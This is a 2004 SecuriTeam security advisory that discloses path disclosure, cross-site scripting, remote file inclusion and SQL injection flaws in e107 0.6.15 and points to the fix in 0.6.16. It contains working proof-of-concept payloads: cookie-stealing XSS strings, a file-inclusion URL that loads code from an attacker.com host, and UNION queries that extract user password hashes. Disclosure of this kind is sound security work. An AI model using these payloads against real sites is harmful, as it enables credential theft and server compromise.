Date: 30 May 2004 19:41:56 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL Injections)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL
Injections)
------------------------------------------------------------------------
SUMMARY
" <http://e107.org/>; e107 is a portal / content management system powered
by PHP and MySQL that gives you a totally dynamic and professional website
out of the box. It's simple wizard type install process will have you up
and running in 5 minutes, and best of all it's completely free."
e107 is vulnerable to multiple types of attacks including: path
disclosures, file inclusions and SQL injections.
DETAILS
Vulnerable Systems:
* e107 version 0.6.15, possibly prior
Immune Systems:
* e107 version 0.6.16
In order to be able to exploit some of these vulnerabilities, the
following conditions must be met:
* "register_globals" must be "on"
* MySQL must be version 4.x with enabled UNION functionality (although on
some occasions one can work around this.)
Full Path Disclosure
Many software developers, webmasters, admins and other IT staff
underestimate full path disclosure as a security bug. They shouldn't, as
it gives valuable information to an attacker. Information that coupled
with other information gathering attacks can lead to a successful
compromise of a host.
This could be one of the reasons why many systems contain partial and full
path disclosure vulnerabilities. Usually this is possible because scripts
can be executed directly by the malicious user, resulting in a PHP error,
which tends to give ample information about the system.
Examples follow:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.phphttp://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.phphttp://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.phphttp://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.phphttp://localhost/e107_0615/e107_plugins/login_menu/login_menu.php
Cross-site Scripting
Using XSS it is possible to steal credentials and cookies, read
cross-domain forms etc. An XSS vulnerability exists in the following
locations:
* In 'clock_menu.php', the following example performs cross site
scripting:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
* In the "email article to a friend" featured, an XSS vulnerability
exists if the attacker is logged off and enters script code to the input
field, like so:
foobar'><body onload=a!ert(document.cookie);>
* The same type of problem exists in the "submit news" feature:
foobar'><body onload=a!ert(document.cookie);>
* In the user settings script, an attacker who is logged on issues a POST
request such as the following, which triggers an XSS:
http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]
Remote File Inclusion
If PHP is configured with "allow_url_fopen=on" and there is no firewall
which blocks outbound traffic, then an attacker can force execution of PHP
code in the target host. This can lead to shell-level server compromise
(if there are permissions to execute system commands) with "nobody" or
"apache" privileges. If these are possible, local root exploits can be
executed and the server will be completely compromised. The problem is
located in the 'secure_img_render.php' script.
Example:
http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Note: This requires that "register globals" be ON in order to be
effective.
SQL Injection
The following locations contain SQL injection bugs:
* The 'content.php' script, which can be exploited in the following
manner:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null, null, null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
* Another SQL injection in the same script but done differently:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null, null, null%20FROM%20e107_user%20WHERE%20user_id=1/*
* In the 'news.php' script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,
null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null,
null, null, null, null, null, null, null,
null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
Patch Availability:
The above-mentioned problems have been fixed in version 0.6.16. All users
of the system are highly encouraged to upgrade their version.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Janek
Vind.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
